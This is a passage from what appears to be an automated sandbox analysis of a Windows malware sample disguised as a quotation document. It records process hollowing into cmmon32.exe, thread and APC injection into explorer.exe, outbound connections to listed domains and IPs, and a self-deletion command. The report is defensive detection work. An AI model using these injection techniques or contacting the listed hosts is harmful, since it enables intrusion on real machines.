          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04818EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04808E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04814A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04814A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04864257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0489138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0489131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04803B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04803B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.quotovate.com
          Source: C:\Windows\explorer.exeNetwork Connect: 204.11.58.233 80
          Source: C:\Windows\explorer.exeDomain query: www.tomio.tech
          Source: C:\Windows\explorer.exeDomain query: www.everesttechsolutions.com
          Source: C:\Windows\explorer.exeNetwork Connect: 47.222.2.124 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3292
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 3D0000
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: explorer.exe, 0000000B.00000000.350335948.0000000001400000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 0000000B.00000000.334676030.0000000005F40000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.350335948.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.349692580.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 0000000B.00000000.350335948.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.338696952.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
